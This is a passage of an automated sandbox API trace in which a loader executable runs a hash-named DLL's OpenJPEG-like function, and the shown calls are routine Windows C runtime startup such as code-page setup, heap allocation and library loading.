lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0251.532] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0251.532] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0251.532] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0251.532] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_decoded_tile" [0251.532] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_decoded_tile" [0251.532] GetACP () returned 0x4e4 [0251.533] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x228) returned 0x405380 [0251.533] IsValidCodePage (CodePage=0x4e4) returned 1 [0251.533] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0251.533] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0251.533] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0251.533] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0251.533] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0251.533] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0251.533] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0251.533] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0251.533] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0251.533] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0251.533] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0251.533] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0251.533] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0251.533] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0251.533] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0251.533] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0251.533] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0251.533] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x100) returned 0x4126c0 [0251.534] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x17c) returned 0x409aa0 [0251.534] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0251.534] GetLastError () returned 0x0 [0251.534] SetLastError (dwErrCode=0x0) [0251.534] GetEnvironmentStringsW () returned 0x414680* [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x9cc) returned 0x415060 [0251.534] FreeEnvironmentStringsW (penv=0x414680) returned 1 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x118) returned 0x40a230 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x3e) returned 0x410680 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x5c) returned 0x400780 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x62) returned 0x404c00 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x78) returned 0x40c6f0 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x62) returned 0x405a40 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x28) returned 0x40b6b0 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x48) returned 0x410450 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x1a) returned 0x40b320 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x3a) returned 0x410ea0 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x62) returned 0x404510 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x2a) returned 0x40c770 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x2e) returned 0x404c70 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x1c) returned 0x40b9b0 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xd2) returned 0x405cd0 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x7c) returned 0x404000 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x3a) returned 0x410220 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x90) returned 0x403c20 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x24) returned 0x40b380 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x30) returned 0x404580 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x36) returned 0x405ab0 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x3c) returned 0x4109a0 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x52) returned 0x408fc0 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x3c) returned 0x4104a0 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xd6) returned 0x405610 [0251.534] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x2e) returned 0x4020d0 [0251.535] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x1e) returned 0x40b950 [0251.535] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x2c) returned 0x402110 [0251.535] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x54) returned 0x409440 [0251.535] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x52) returned 0x409620 [0251.535] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x24) returned 0x40b440 [0251.535] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x42) returned 0x40ff50 [0251.535] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x2c) returned 0x402150 [0251.535] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x44) returned 0x40ffa0 [0251.535] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x24) returned 0x40b650 [0251.535] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x415060 | out: hHeap=0x400000) returned 1 [0251.535] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x1000) returned 0x414680 [0251.535] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0251.535] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0251.535] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_decoded_tile" [0251.535] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_decoded_tile", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x409770*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0251.536] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0251.540] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0251.540] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0251.540] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0251.540] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0251.540] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0251.541] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0251.542] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0251.542] GetProcessHeap () returned 0x400000 [0251.542] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0251.542] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0251.542] GetLastError () returned 0x0 [0251.543] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0251.543] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0251.543] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x3c8) returned 0x415b10 [0251.543] SetLastError (dwErrCode=0x0) [0251.543] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x1200) returned 0x415ee0 [0251.548] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0251.548] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0251.549] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0251.549] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0251.549] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_decoded_tile" [0251.549] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_decoded_tile" [0251.549] GetACP () returned 0x4e4 [0251.549] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x228) returned 0x40aca0 [0251.549] IsValidCodePage (CodePage=0x4e4) returned 1 [0251.550] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0251.550] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0251.550] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0251.550] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0251.550] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 